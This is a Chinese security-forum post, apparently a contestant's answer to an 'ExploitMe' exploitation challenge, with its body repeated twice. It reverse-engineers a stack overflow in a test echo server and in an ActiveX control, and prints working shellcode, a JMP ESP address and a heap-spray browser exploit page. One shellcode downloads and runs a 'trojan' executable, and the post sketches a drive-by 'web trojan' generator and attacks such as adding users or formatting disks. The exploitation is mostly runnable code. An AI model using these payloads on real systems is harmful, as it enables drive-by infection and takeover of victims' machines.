-
-
[原创]ExploitMe挑战赛我的AB题的答卷.....
-
2008-1-2 10:19 7774
-
全部是copy的提交区word文档里面的内容,水平很菜,高手莫笑
整理真的好繁琐...还是习惯直接甩word里。
第一题:
PE分析:
Exploit_me_A.exe是一个存在缓冲区漏洞的网络服务程序,它接受客户端的连接请求并接受客户端发送的数据,同时服务的给与回显,类似echo.
漏洞描述
漏洞分析:
通过动态&&静态逆向分析,可以定位到有问题的函数在sub_401000函数处,此函数内部调用一个缓冲区溢出高危险函数strcpy(...)。
.text:00401000 sub_401000 proc near ; CODE XREF: _main+1A0p
.text:00401000
.text:00401000 var_C8 = byte ptr -0C8h
.text:00401000 arg_0 = dword ptr 4
.text:00401000
.text:00401000 sub esp, 0C8h ; 开辟200个字节的缓冲区,
.text:00401006 or ecx, 0FFFFFFFFh
.text:00401009 xor eax, eax
.text:0040100B lea edx, [esp+0C8h+var_C8]
.text:0040100F push esi
.text:00401010 push edi
.text:00401011 mov edi, [esp+0D0h+arg_0]
.text:00401018 push offset asc_40904C ; "********************"
.text:0040101D repne scasb
.text:0040101F not ecx
.text:00401021 sub edi, ecx
.text:00401023 mov eax, ecx
.text:00401025 mov esi, edi
.text:00401027 mov edi, edx
.text:00401029 shr ecx, 2
.text:0040102C rep movsd ;溢出strcpy
.text:0040102E mov ecx, eax
.text:00401030 and ecx, 3
..........................
还原为C伪代码
int __cdecl sub_401000(int a1)
{
.......
strcpy(&v5, (const char *)a1);
ostream__operator__((int)&dword_409A68, (int)"********************");
v2 = ostream__operator__(10);
sub_4012B0(v2, (int)sub_4012D0);
.......
}
开始构造漏洞利用程序:
第一步:判断漏洞的存在性,通过发送超长数据发现服务器崩溃,如下图,基本可以验证服务器存在缓冲区溢出漏洞,代码见test.cpp
第二步:构造有规则的字符串,通过计算定位溢出点,代码见test.cpp
计算:(0x55-0x41)得10进制*10+(0x41-0x41)的10进制 = 200
第三步:验证溢出点的正确性,如图,42424242对应于BBBB的16进制
第四步:构建POC,使运行有漏洞主机的主机成功执行指定shellcode,如图,代码见poc.cpp
shellcode描述:
/*failwest大大的专用shellcode,弹出对话框MessageBox(NULL,"failwest","failwest",0)*/
char failwest_popup[]=
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8";
exploit运行截图
稳定性与通用性论证
Shellcode没话说,采用通用shellcode打造滴,faiwest专用值得信赖!
本测试平台为windows xpsp2中文版,典型的栈溢出,采用中文版通用
JMPESP7ffa4512
综上2点,对于本次A题的溢出,可以说是稳定+通用!
创新性论证(可选)
无...-_-
第二题:[/B]
漏洞定位:
对于ActiveX控件的漏洞,对我而言,首先会去选择fuzzing,而fuzzing ActiveX自然选择防御实验室出品的Com fuzzing利器COMRaider。
比赛的关系加上比赛只要求完全一个漏洞即可,所以猜测性的让COMRaider测试exploit_me_B.dll中的一些成员函数。很容易的fuzz出函数GetRemoteFileTime存在溢出漏洞。
下面以有漏洞的函数Sub LoadPage (ByVal URL As String , ByVal x As Long ,ByVal y As Long , ByVal Zoom As Single }为例
验证漏洞的存在性
<!—test.html-->
<html>
<object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2" id='Crash'></object>
<input language=JavaScript onclick=CrashMe() type="button" value="CrashMe^_^">
<script language="JavaScript">
function CrashMe()
{
var buffer = "a";
while (buffer.length < 500) buffer += buffer;
//while (buffer.length < 256) buffer += 'b'; buffer += 'aaaa';溢出点
var a=1;
var b=1;
var c=1;
Crash.LoadPage(buffer,a,b,c);
}
</script>
</html>
漏洞描述及危害分析:
由前面的测试初步可以估计 LoadPage函数引发了一个栈溢出.除了LoadPage函数,DownLoad,GetRemoteFileTime,GetRemoteFileTime等函数都有这溢出漏洞,如果被恶意利用的话,譬如挂马等,后果将非常严重。
分析:
用OllyIce附加IE浏览器来分析这个漏洞函数的情况,OD附加IE,在IE中打开test.html
点击确定以后,使用Shift+F7/F8/F9忽略异常..EIP被"aaaa"即61616161覆盖
很容易可以定位到LoadPage的第一个溢出点是在256个字节,基本上可以使用nop+jmpesp+nop+shellcode的常规栈利用方法,但是这里为了增加通用性后稳定故使用Heap Spray方式。
漏洞利用,详细代码见calc_exploit.html
<html>
<object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2" id='target'></objetc>
<body>
<script language="JavaScript">
var shellcode = ... //在shllcode描述处
bigblock = unescape("%u9090邐");
headersize = 20;
Slackspace = headersize+shellcode.length
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<600;i++) memory[i] = block + shellcode;
var buffer = unescape("%0D");
while (buffer.length< 300) buffer+=unescape("%0D");
var a=1;
var b=1;
var c=1;
target.LoadPage(buffer,a,b,c);
</script>
</body>
</html>
其他利用:
成功执行运行计算器的poc后,基本可以确定此漏洞可以多加利用,通过更换需要的shellcode达到其他攻击的目的,比如最常用的就是在入侵的服务器上挂马(下载执行的shellcode),添加用户的shellcode,再或者可以写入脚本开启目标主机的3389,邮件和QQ都可以成为期传播利用的途径,恶心一点的还可以格式化别人的磁盘等等..
下面仅以网马为例子:
通常恶意攻击者会将网马插在一些他们已经控制的服务器的页面中,这样当用户去访问这台web服务器的页面的同时,内嵌的网马也悄悄的跟着运行,如果用户的机器上恰好安装有类似B题的有漏洞的控件将会导致中木马。
模拟实现的网马生成器,最终生成exp_troan。Html,这就是上面说的网马,详细见提交代码。
shellcode描述
/*本shellcode来源于网络,用于poc的测试,成功执行将运行计算器*/
var shellcode =
unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" +
"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" +
"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424" +
"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304" +
"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0" +
"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A" +
"%uFF57%u63E7%u6C61%u0063");
/*本shellcode来源于网络,修改使其成为Unicode shellcode,成功执行将会到指定服务器器下载木马并运行,默认是下载自己搭建的服务器上的文件http://127.0.0.1/cmd.exe*/
//注意:不管服务端木马程序名为什么,此shellcode都是将文件下载至C盘重命名为U。
//exe,判断木马程序是否被下载执行可以打开任务管理器查看,见exploit运行截面
变换前:
unsigned char sc[] =
"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03"
"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74"
"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E"
"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03"
"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C"
"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40"
"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C"
"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC"
"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F"
"\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB"
"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83"
"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF"
"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF";
变换后:
var shellcode =
unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" +
"%u54eb%u758b%u8b3c%u3574%u0378%u56f5%u768b%u0320" +
"%u33f5%u49c9%uad41%udb33%u0f36%u14be%u3828%u74f2" +
"%uc108%u0dcb%uda03%ueb40%u3bef%u75df%u5ee7%u5e8b" +
"%u0324%u66dd%u0c8b%u8b4b%u1c5e%udd03%u048b%u038b" +
"%uc3c5%u7275%u6d6c%u6e6f%u642e%u6c6c%u4300%u5c3a" +
"%u2e55%u7865%u0065%uc033%u0364%u3040%u0c78%u408b" +
"%u8b0c%u1c70%u8bad%u0840%u09eb%u408b%u8d34%u7c40" +
"%u408b%u953c%u8ebf%u0e4e%ue8ec%uff84%uffff%uec83" +
"%u8304%u242c%uff3c%u95d0%ubf50%u1a36%u702f%u6fe8" +
"%uffff%u8bff%u2454%u8dfc%uba52%udb33%u5353%ueb52" +
"%u5324%ud0ff%ubf5d%ufe98%u0e8a%u53e8%uffff%u83ff" +
"%u04ec%u2c83%u6224%ud0ff%u7ebf%ue2d8%ue873%uff40" +
"%uffff%uff52%ue8d0%uffd7%uffff%u7468%u7074%u2f3a" +
"%u312f%u3732%u302e%u302e%u312e%u632f%u646d%u652e" +
"%u6578%u0000");
变换函数:
exploit运行截图
稳定性与通用性论证
采用Heap Spray方式,把nop和shellcode分布到连续的几个堆块中,然后将溢出点的位置覆盖为堆块的地址.这样很容易执行到shellcode,相对于传统的jmpesp+shellcode方式更具有稳定性和通用性,不用去考虑是否有通用的jmp esp或者jmp ebx。
在堆溢出中,有时因为程序的0x0d0d0d0d或0x0c0c0c0c等地址被占用,所以无法下滑到shellcode处,应格外注意,但是本题的栈溢出,所以并不会影响其稳定性!
所以本程序的利用的通用性和稳定性还是比较好的。
创新性论证(可选)
唉...无-_-
---------------------------------------------------------------------------------
补记
31号迎新年的时候,随便浏览了下自己的B题,发现漏了把OD里的代码copy进文档。本打算重新提交修改,但是这个时候已经提交20多个,担心自己拿不到速度分,因为我交的也算蛮早的。权衡了下,原理+能想到的方法+攻击场景+攻击步骤15分,15除以4得4,而速度可以得5分。所以就没交。
这里给出来,供大家看看,莫笑哦
1001CD30 55 push ebp
1001CD31 8BEC mov ebp, esp
.........
1001CDA2 C606 00 mov byte ptr [esi], 0
1001CDA5 FF15 F4900C10 call dword ptr [<&KERNEL32.WideCharToMultiByte>] ; kernel32.WideCharToMultiByte
1001CDAB 56 push esi
1001CDAC 8BCB mov ecx, ebx
1001CDAE E8 1D8DFFFF call 10015AD0 ; //F7跟进
1001CDB3 8D65 F4 lea esp, dword ptr [ebp-C]
1001CDB6 33C0 xor eax, eax
---------------------------------------------------------------------------------
10015AD0 8B4424 04 mov eax, dword ptr [esp+4]
.....
10015ADA C786 64400000 0>mov dword ptr [esi+4064], 0
10015AE4 E8 27D2FFFF call 10012D10 ; //F7跟进
......
10015AF1 C2 0400 retn 4
----------------------------------------------------------------------------------
10012D10 81EC 04030000 sub esp, 304
............
10012D9F E8 1C100000 call 10013DC0 ; //F7跟进
10012DA4 8B85 78270000 mov eax, dword ptr [ebp+2778]
10012DAA 899D 84270000 mov dword ptr [ebp+2784], ebx
-----------------------------------------------------------------------------------
10013DC0 81EC 0C010000 sub esp, 10C
.....
10013DE7 C1E9 02 shr ecx, 2
10013DEA F3:A5 rep movs dword ptr es:[edi], dword ptr [esi] ; //溢出
10013DEC 8BC8 mov ecx, eax
10013DEE 8B82 943F0000 mov eax, dword ptr [edx+3F94]
10013DF4 83E1 03 and ecx, 3
10013DF7 83F8 01 cmp eax, 1
10013DFA F3:A4 rep movs byte ptr es:[edi], byte ptr [esi] ; //溢出
10013DFC 0F85 18010000 jnz 10013F1A ; //这里会跳,然后over
.............
10013F1A 5F pop edi ; 0013B460
10013F1B 5E pop esi
10013F1C 32C0 xor al, al
10013F1E 5B pop ebx
10013F1F 81C4 0C010000 add esp, 10C
10013F25 C2 0800 retn 8
还原为C伪代码(F5之)
memcpy((void *)Str1, v16, 4 * v14);
v17 = (char *)v16 + 4 * v14;
v18 = (void *)&Str1[4 * v14];
LOBYTE(v14) = v15;
v19 = *(_DWORD *)(v3 + 16276);
memcpy(v18, v17, v14 & 3);
----------------------------------------------------------------------------------
刚忘记传测试代码了....现在补上。B题网马可以自己搭建服务器测试,也可以将测试exe文件传到自己的空间测试等等。
整理真的好繁琐...还是习惯直接甩word里。
第一题:
PE分析:
Exploit_me_A.exe是一个存在缓冲区漏洞的网络服务程序,它接受客户端的连接请求并接受客户端发送的数据,同时服务的给与回显,类似echo.
漏洞描述
漏洞分析:
通过动态&&静态逆向分析,可以定位到有问题的函数在sub_401000函数处,此函数内部调用一个缓冲区溢出高危险函数strcpy(...)。
.text:00401000 sub_401000 proc near ; CODE XREF: _main+1A0p
.text:00401000
.text:00401000 var_C8 = byte ptr -0C8h
.text:00401000 arg_0 = dword ptr 4
.text:00401000
.text:00401000 sub esp, 0C8h ; 开辟200个字节的缓冲区,
.text:00401006 or ecx, 0FFFFFFFFh
.text:00401009 xor eax, eax
.text:0040100B lea edx, [esp+0C8h+var_C8]
.text:0040100F push esi
.text:00401010 push edi
.text:00401011 mov edi, [esp+0D0h+arg_0]
.text:00401018 push offset asc_40904C ; "********************"
.text:0040101D repne scasb
.text:0040101F not ecx
.text:00401021 sub edi, ecx
.text:00401023 mov eax, ecx
.text:00401025 mov esi, edi
.text:00401027 mov edi, edx
.text:00401029 shr ecx, 2
.text:0040102C rep movsd ;溢出strcpy
.text:0040102E mov ecx, eax
.text:00401030 and ecx, 3
..........................
还原为C伪代码
int __cdecl sub_401000(int a1)
{
.......
strcpy(&v5, (const char *)a1);
ostream__operator__((int)&dword_409A68, (int)"********************");
v2 = ostream__operator__(10);
sub_4012B0(v2, (int)sub_4012D0);
.......
}
开始构造漏洞利用程序:
第一步:判断漏洞的存在性,通过发送超长数据发现服务器崩溃,如下图,基本可以验证服务器存在缓冲区溢出漏洞,代码见test.cpp
第二步:构造有规则的字符串,通过计算定位溢出点,代码见test.cpp
计算:(0x55-0x41)得10进制*10+(0x41-0x41)的10进制 = 200
第三步:验证溢出点的正确性,如图,42424242对应于BBBB的16进制
第四步:构建POC,使运行有漏洞主机的主机成功执行指定shellcode,如图,代码见poc.cpp
shellcode描述:
/*failwest大大的专用shellcode,弹出对话框MessageBox(NULL,"failwest","failwest",0)*/
char failwest_popup[]=
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8";
exploit运行截图
稳定性与通用性论证
Shellcode没话说,采用通用shellcode打造滴,faiwest专用值得信赖!
本测试平台为windows xpsp2中文版,典型的栈溢出,采用中文版通用
JMPESP7ffa4512
综上2点,对于本次A题的溢出,可以说是稳定+通用!
创新性论证(可选)
无...-_-
第二题:[/B]
漏洞定位:
对于ActiveX控件的漏洞,对我而言,首先会去选择fuzzing,而fuzzing ActiveX自然选择防御实验室出品的Com fuzzing利器COMRaider。
比赛的关系加上比赛只要求完全一个漏洞即可,所以猜测性的让COMRaider测试exploit_me_B.dll中的一些成员函数。很容易的fuzz出函数GetRemoteFileTime存在溢出漏洞。
下面以有漏洞的函数Sub LoadPage (ByVal URL As String , ByVal x As Long ,ByVal y As Long , ByVal Zoom As Single }为例
验证漏洞的存在性
<!—test.html-->
<html>
<object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2" id='Crash'></object>
<input language=JavaScript onclick=CrashMe() type="button" value="CrashMe^_^">
<script language="JavaScript">
function CrashMe()
{
var buffer = "a";
while (buffer.length < 500) buffer += buffer;
//while (buffer.length < 256) buffer += 'b'; buffer += 'aaaa';溢出点
var a=1;
var b=1;
var c=1;
Crash.LoadPage(buffer,a,b,c);
}
</script>
</html>
漏洞描述及危害分析:
由前面的测试初步可以估计 LoadPage函数引发了一个栈溢出.除了LoadPage函数,DownLoad,GetRemoteFileTime,GetRemoteFileTime等函数都有这溢出漏洞,如果被恶意利用的话,譬如挂马等,后果将非常严重。
分析:
用OllyIce附加IE浏览器来分析这个漏洞函数的情况,OD附加IE,在IE中打开test.html
点击确定以后,使用Shift+F7/F8/F9忽略异常..EIP被"aaaa"即61616161覆盖
很容易可以定位到LoadPage的第一个溢出点是在256个字节,基本上可以使用nop+jmpesp+nop+shellcode的常规栈利用方法,但是这里为了增加通用性后稳定故使用Heap Spray方式。
漏洞利用,详细代码见calc_exploit.html
<html>
<object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2" id='target'></objetc>
<body>
<script language="JavaScript">
var shellcode = ... //在shllcode描述处
bigblock = unescape("%u9090邐");
headersize = 20;
Slackspace = headersize+shellcode.length
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<600;i++) memory[i] = block + shellcode;
var buffer = unescape("%0D");
while (buffer.length< 300) buffer+=unescape("%0D");
var a=1;
var b=1;
var c=1;
target.LoadPage(buffer,a,b,c);
</script>
</body>
</html>
其他利用:
成功执行运行计算器的poc后,基本可以确定此漏洞可以多加利用,通过更换需要的shellcode达到其他攻击的目的,比如最常用的就是在入侵的服务器上挂马(下载执行的shellcode),添加用户的shellcode,再或者可以写入脚本开启目标主机的3389,邮件和QQ都可以成为期传播利用的途径,恶心一点的还可以格式化别人的磁盘等等..
下面仅以网马为例子:
通常恶意攻击者会将网马插在一些他们已经控制的服务器的页面中,这样当用户去访问这台web服务器的页面的同时,内嵌的网马也悄悄的跟着运行,如果用户的机器上恰好安装有类似B题的有漏洞的控件将会导致中木马。
模拟实现的网马生成器,最终生成exp_troan。Html,这就是上面说的网马,详细见提交代码。
shellcode描述
/*本shellcode来源于网络,用于poc的测试,成功执行将运行计算器*/
var shellcode =
unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" +
"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" +
"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424" +
"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304" +
"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0" +
"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A" +
"%uFF57%u63E7%u6C61%u0063");
/*本shellcode来源于网络,修改使其成为Unicode shellcode,成功执行将会到指定服务器器下载木马并运行,默认是下载自己搭建的服务器上的文件http://127.0.0.1/cmd.exe*/
//注意:不管服务端木马程序名为什么,此shellcode都是将文件下载至C盘重命名为U。
//exe,判断木马程序是否被下载执行可以打开任务管理器查看,见exploit运行截面
变换前:
unsigned char sc[] =
"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03"
"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74"
"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E"
"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03"
"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C"
"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40"
"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C"
"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC"
"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F"
"\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB"
"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83"
"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF"
"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF";
变换后:
var shellcode =
unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" +
"%u54eb%u758b%u8b3c%u3574%u0378%u56f5%u768b%u0320" +
"%u33f5%u49c9%uad41%udb33%u0f36%u14be%u3828%u74f2" +
"%uc108%u0dcb%uda03%ueb40%u3bef%u75df%u5ee7%u5e8b" +
"%u0324%u66dd%u0c8b%u8b4b%u1c5e%udd03%u048b%u038b" +
"%uc3c5%u7275%u6d6c%u6e6f%u642e%u6c6c%u4300%u5c3a" +
"%u2e55%u7865%u0065%uc033%u0364%u3040%u0c78%u408b" +
"%u8b0c%u1c70%u8bad%u0840%u09eb%u408b%u8d34%u7c40" +
"%u408b%u953c%u8ebf%u0e4e%ue8ec%uff84%uffff%uec83" +
"%u8304%u242c%uff3c%u95d0%ubf50%u1a36%u702f%u6fe8" +
"%uffff%u8bff%u2454%u8dfc%uba52%udb33%u5353%ueb52" +
"%u5324%ud0ff%ubf5d%ufe98%u0e8a%u53e8%uffff%u83ff" +
"%u04ec%u2c83%u6224%ud0ff%u7ebf%ue2d8%ue873%uff40" +
"%uffff%uff52%ue8d0%uffd7%uffff%u7468%u7074%u2f3a" +
"%u312f%u3732%u302e%u302e%u312e%u632f%u646d%u652e" +
"%u6578%u0000");
变换函数:
exploit运行截图
稳定性与通用性论证
采用Heap Spray方式,把nop和shellcode分布到连续的几个堆块中,然后将溢出点的位置覆盖为堆块的地址.这样很容易执行到shellcode,相对于传统的jmpesp+shellcode方式更具有稳定性和通用性,不用去考虑是否有通用的jmp esp或者jmp ebx。
在堆溢出中,有时因为程序的0x0d0d0d0d或0x0c0c0c0c等地址被占用,所以无法下滑到shellcode处,应格外注意,但是本题的栈溢出,所以并不会影响其稳定性!
所以本程序的利用的通用性和稳定性还是比较好的。
创新性论证(可选)
唉...无-_-
---------------------------------------------------------------------------------
补记
31号迎新年的时候,随便浏览了下自己的B题,发现漏了把OD里的代码copy进文档。本打算重新提交修改,但是这个时候已经提交20多个,担心自己拿不到速度分,因为我交的也算蛮早的。权衡了下,原理+能想到的方法+攻击场景+攻击步骤15分,15除以4得4,而速度可以得5分。所以就没交。
这里给出来,供大家看看,莫笑哦
1001CD30 55 push ebp
1001CD31 8BEC mov ebp, esp
.........
1001CDA2 C606 00 mov byte ptr [esi], 0
1001CDA5 FF15 F4900C10 call dword ptr [<&KERNEL32.WideCharToMultiByte>] ; kernel32.WideCharToMultiByte
1001CDAB 56 push esi
1001CDAC 8BCB mov ecx, ebx
1001CDAE E8 1D8DFFFF call 10015AD0 ; //F7跟进
1001CDB3 8D65 F4 lea esp, dword ptr [ebp-C]
1001CDB6 33C0 xor eax, eax
---------------------------------------------------------------------------------
10015AD0 8B4424 04 mov eax, dword ptr [esp+4]
.....
10015ADA C786 64400000 0>mov dword ptr [esi+4064], 0
10015AE4 E8 27D2FFFF call 10012D10 ; //F7跟进
......
10015AF1 C2 0400 retn 4
----------------------------------------------------------------------------------
10012D10 81EC 04030000 sub esp, 304
............
10012D9F E8 1C100000 call 10013DC0 ; //F7跟进
10012DA4 8B85 78270000 mov eax, dword ptr [ebp+2778]
10012DAA 899D 84270000 mov dword ptr [ebp+2784], ebx
-----------------------------------------------------------------------------------
10013DC0 81EC 0C010000 sub esp, 10C
.....
10013DE7 C1E9 02 shr ecx, 2
10013DEA F3:A5 rep movs dword ptr es:[edi], dword ptr [esi] ; //溢出
10013DEC 8BC8 mov ecx, eax
10013DEE 8B82 943F0000 mov eax, dword ptr [edx+3F94]
10013DF4 83E1 03 and ecx, 3
10013DF7 83F8 01 cmp eax, 1
10013DFA F3:A4 rep movs byte ptr es:[edi], byte ptr [esi] ; //溢出
10013DFC 0F85 18010000 jnz 10013F1A ; //这里会跳,然后over
.............
10013F1A 5F pop edi ; 0013B460
10013F1B 5E pop esi
10013F1C 32C0 xor al, al
10013F1E 5B pop ebx
10013F1F 81C4 0C010000 add esp, 10C
10013F25 C2 0800 retn 8
还原为C伪代码(F5之)
memcpy((void *)Str1, v16, 4 * v14);
v17 = (char *)v16 + 4 * v14;
v18 = (void *)&Str1[4 * v14];
LOBYTE(v14) = v15;
v19 = *(_DWORD *)(v3 + 16276);
memcpy(v18, v17, v14 & 3);
----------------------------------------------------------------------------------
刚忘记传测试代码了....现在补上。B题网马可以自己搭建服务器测试,也可以将测试exe文件传到自己的空间测试等等。
[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法
赞赏
他的文章
[原创]toplcj的B题答卷上传
4675
[原创]toplcj的A题答卷
14437
谁下载
lelfei
bstzxy
kanxue
forgot
wwiinngd
fzysoft
DamnYa
csjwaman
softworm
娃娃[CCG]
hume
ldljlzw
xingbing
ylp1332
刘国华
Aaah
kylinpoet
脱脱
CoDe_Inject
Tee8088
HaIlDuZ
Xacs
somuch
无聊的菜鸟
sscheng
throb
vofcrlfopt
robin
ufwt
layper
pmma
flib
d1y2j3
hb6106
YUNCC
mydear256
骷髅x
执着我一生
商朝子
随风追忆
shoooo
asd2002
fqh
netrice
wudiweiwei
ssarg
coffeedrin
naitai
kiu
qyyzpy
progray
mxhk
yijun8354
bjdudu
pentacleNC
arwin
快雪时晴
aki
Sowhat
zhuwg
whydbg
firefly
阿牛
sombad
来来去去
likunkun
chenjun
chipower
ABCdiyPE
HSQ
qqeleven
qandzjl
wangshutai
foxabu
lcjxb
lenix
Intelfan
jinyh
netxfly
hawking
heihu
sbright
lendy
渗透
五德转移
yiting
gdszmai
RuShi
asd
crdchen
ldsjlm
coolfly
olajunwon
sagittar
alangsos
dico
xhackx
lijingli
dttom
谁下载
lelfei
bstzxy
kanxue
forgot
wwiinngd
fzysoft
DamnYa
csjwaman
softworm
娃娃[CCG]
hume
ldljlzw
xingbing
ylp1332
刘国华
Aaah
kylinpoet
脱脱
CoDe_Inject
Tee8088
HaIlDuZ
Xacs
somuch
无聊的菜鸟
sscheng
throb
robin
ufwt
layper
pmma
flib
d1y2j3
hb6106
YUNCC
mydear256
骷髅x
执着我一生
商朝子
随风追忆
shoooo
asd2002
fqh
netrice
wudiweiwei
ssarg
coffeedrin
naitai
kiu
qyyzpy
progray
mxhk
yijun8354
bjdudu
pentacleNC
arwin
快雪时晴
aki
Sowhat
zhuwg
whydbg
firefly
阿牛
sombad
来来去去
likunkun
chenjun
chipower
foria
ABCdiyPE
HSQ
qqeleven
qandzjl
wangshutai
foxabu
lcjxb
lenix
Intelfan
jinyh
netxfly
hawking
heihu
sbright
lendy
渗透
五德转移
yiting
gdszmai
RuShi
asd
crdchen
ldsjlm
coolfly
